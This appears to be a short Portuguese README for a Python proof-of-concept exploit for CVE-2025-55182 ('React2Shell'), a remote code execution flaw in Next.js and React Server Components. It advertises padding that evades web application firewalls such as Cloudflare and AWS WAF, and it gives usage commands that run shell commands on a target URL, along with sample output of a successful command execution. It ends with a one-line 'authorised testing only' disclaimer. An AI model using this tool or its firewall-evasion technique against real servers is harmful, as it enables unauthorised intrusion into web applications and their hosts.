
Python PoC para CVE-2025-55182 (React2Shell) RCE no Next.js/React Server Components com dynamic WAF bypass padding para testes de segurança autorizados.
Um exploit de prova de conceito Python limpo e confiável para CVE-2025-55182 (também conhecido como React2Shell), uma vulnerabilidade crítica de execução remota de código nos Componentes do Servidor React usados pelo Next.js (App Router) e frameworks similares.
Este PoC inclui padding dinâmico de bypass de WAF para evadir firewalls de aplicação web comuns (Cloudflare, AWS WAF, etc.) que limitam a inspeção profunda de corpos multipart grandes.
requestspip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
Esta ferramenta é apenas para testes de segurança autorizados e pesquisa.